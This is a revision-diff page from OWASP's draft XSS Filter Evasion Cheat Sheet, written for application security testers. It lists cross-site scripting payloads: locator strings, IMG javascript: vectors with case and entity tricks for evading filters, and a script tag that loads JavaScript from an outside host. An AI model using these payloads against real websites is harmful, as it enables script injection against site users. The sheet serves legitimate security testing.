Difference between revisions of "XSS Filter Evasion Cheat Sheet"

From OWASP
Jump to: navigation, search
Line 41: Line 41:
  
 
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
 
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
 +
 +
== No quotes and no semicolon: ==
 +
 +
<IMG SRC=javascript:alert('XSS')>
 +
 +
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
 +
 +
== Case insensitive XSS attack vector: ==
 +
 +
<IMG SRC=JaVaScRiPt:alert('XSS')>
 +
 +
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
 +
 +
== HTML entities ==
 +
The semicolons are required for this to work:
 +
 +
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
 +
 +
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
 +
  
 
= References =
 
= References =

Revision as of 19:48, 3 September 2012

DRAFT CHEAT SHEET - WORK IN PROGRESS

Introduction

This article is focused on providing application security testing professionals with a guide to assist in Cross Site Scripting testing.

Tests

This cheat sheet is for people who already understand the basics of XSS attacks but want a deep understanding of the nuances regarding filter evasion.

Please note that most of these cross site scripting vectors have been tested in the browsers listed at the bottom of the page.

XSS Locator

Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. Use this URL encoding calculator to encode the entire string. Tip: if you're in a rush and need to quickly check a page, often times injecting the depreciated "<PLAINTEXT>" tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably:

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

XSS locator 2

If you don't have much space and know there is no vulnerable JavaScript on the page, this string is a nice compact XSS injection check. View source after injecting it and look for <XSS verses <XSS to see if it is vulnerable:

;!--"<XSS>=&{()}

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

No Filter Evasion

This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here):

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


Image XSS using the JavaScript directive

Image XSS using the JavaScript directive (IE7.0 doesn't support the JavaScript directive in context of an image, but it does in other contexts, but the following show the principles that would work in other tags as well - I'll probably revise this at a later date):

<IMG SRC="javascript:alert('XSS');">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

No quotes and no semicolon:

<IMG SRC=javascript:alert('XSS')>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Case insensitive XSS attack vector:

<IMG SRC=JaVaScRiPt:alert('XSS')>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

HTML entities

The semicolons are required for this to work:

<IMG SRC=javascript:alert("XSS")>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


References

http://ha.ckers.org/xss.html

Authors and Primary Editors

RSnake

OWASP Cheat Sheets Project Homepage